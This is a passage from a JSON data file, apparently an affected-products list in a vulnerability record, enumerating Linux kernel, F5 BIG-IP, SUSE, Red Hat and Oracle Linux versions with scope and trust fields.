        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.5"
      },
      {
        "model": "traffix sdc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "big-ip link controller hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "iworkflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.0.1"
      },
      {
        "model": "big-ip gtm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip afm build 685-hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.22"
      },
      {
        "model": "big-ip gtm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "big-iq device hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.4"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.54"
      },
      {
        "model": "big-ip apm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.11"
      },
      {
        "model": "linux enterprise module for public cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "big-iq security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.5"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.54"
      },
      {
        "model": "big-ip aam hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.87"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.6"
      },
      {
        "model": "big-ip dns build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.01.14.628"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "big-ip pem hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.90"
      },
      {
        "model": "big-ip afm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.110.104.180"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip edge gateway 10.2.3-hf1",
        "scope": null,
        "trust": 0.3,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.9"
      },
      {
        "model": "big-ip ltm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.2"
      },
      {
        "model": "big-ip link controller hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.09"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip aam hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.71"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.2"
      },
      {
        "model": "big-iq security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.4"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.67"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip afm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.9"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip aam hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip link controller hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.26"
      },
      {
        "model": "big-ip asm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.70"
      },
      {
        "model": "big-ip afm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "big-ip pem hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "model": "big-ip analytics hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip aam build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "big-ip ltm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "traffix sdc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.4"
      },
      {
        "model": "big-ip websafe hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip analytics hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.45"
      },
      {
        "model": "big-ip link controller hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip gtm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip gtm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.110.104.180"
      },
      {
        "model": "big-ip aam hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.2"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip afm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip gtm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "big-ip aam hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.39"
      },
      {
        "model": "big-ip analytics hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip apm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.29"
      },
      {
        "model": "big-ip link controller hf11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip aam hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.47"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "traffix sdc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "big-ip ltm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.8"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip aam hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.76"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "big-iq device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.3"
      },
      {
        "model": "big-ip pem hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.1"
      },
      {
        "model": "big-ip apm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.36"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip analytics hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip analytics hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.9"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.24"
      },
      {
        "model": "big-ip analytics hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "big-ip gtm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "big-ip websafe",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.1"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip gtm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.35"
      },
      {
        "model": "big-ip ltm hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.13"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.55"
      },
      {
        "model": "big-ip afm hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip link controller hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip aam hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip link controller hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip ltm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "big-ip apm hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip asm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.34"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.8"
      },
      {
        "model": "big-ip ltm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "linux enterprise server 12-ltss",
        "scope": null,
        "trust": 0.3,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip apm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.21"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.50"
      },
      {
        "model": "big-ip afm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip gtm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.3"
      },
      {
        "model": "big-ip websafe",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip asm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
